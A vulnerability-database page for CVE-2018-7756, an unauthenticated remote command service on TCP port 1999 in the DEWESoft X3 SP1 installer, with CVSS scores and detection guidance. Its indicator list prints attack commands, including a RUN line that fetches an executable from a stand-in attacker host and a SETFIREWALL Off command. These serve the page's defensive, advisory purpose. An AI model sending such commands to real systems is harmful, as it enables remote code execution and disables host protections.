cbcvebase.
CVE-2018-7756
published 2018-03-15

CVE-2018-7756: RunExeFile.exe in the installer for DEWESoft X3 SP1 (64-bit) devices does not require authentication for sessions on TCP port 1999, which allows remote…

PriorityP181critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
62.47%
99.1th percentile
RunExeFile.exe in the installer for DEWESoft X3 SP1 (64-bit) devices does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that launches a .EXE file located at an arbitrary external URL, or a "SETFIREWALL Off" command.

Affected

1 ranges
VendorProductVersion rangeFixed in
dewesoftdewesoft

Detection & IOCsextracted from sources · hover to see the quote

portTCP/1999
filenameRunExeFile.exe
pathC:\Program Files (x86)\Common Files\DEWESoft Shared\
filenameDEWESoft_FULL_X3_SP1_64BIT.exe
commandRUN calc.exe
commandRUN http://ATTACKER-IP/DOOM.exe
commandrunexe c:\Users\victim\Downloads\DOOM.exe
commandSETFIREWALL Off
  • Monitor for unauthenticated TCP connections to port 1999 on hosts running DEWESoft X3 SP1; any inbound session should be treated as suspicious given no authentication is required.
  • Alert on known internal commands (RUN, RUNEX, GETFIREWALL, SETFIREWALL, KILL, USERNAME, SHUTDOWN, SENDKEYS, LIST, DWPIPE) transmitted over TCP/1999 to detect exploitation attempts.
  • Detect process execution of RunExeFile.exe spawning child processes or making outbound HTTP/S connections to external URLs, which indicates the RUN command being abused to download and execute remote payloads.
  • Flag SETFIREWALL Off commands on TCP/1999 as a high-severity indicator of an attacker disabling host firewall protections via the RunExeFile.exe interface.
  • ·The vulnerable component RunExeFile.exe is installed only when using the full installer; partial or custom installs may not deploy it to the default shared path.
  • ·The internal command set of RunExeFile.exe is undocumented by the vendor, meaning the full attack surface beyond the demonstrated commands may be broader than what is publicly known.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.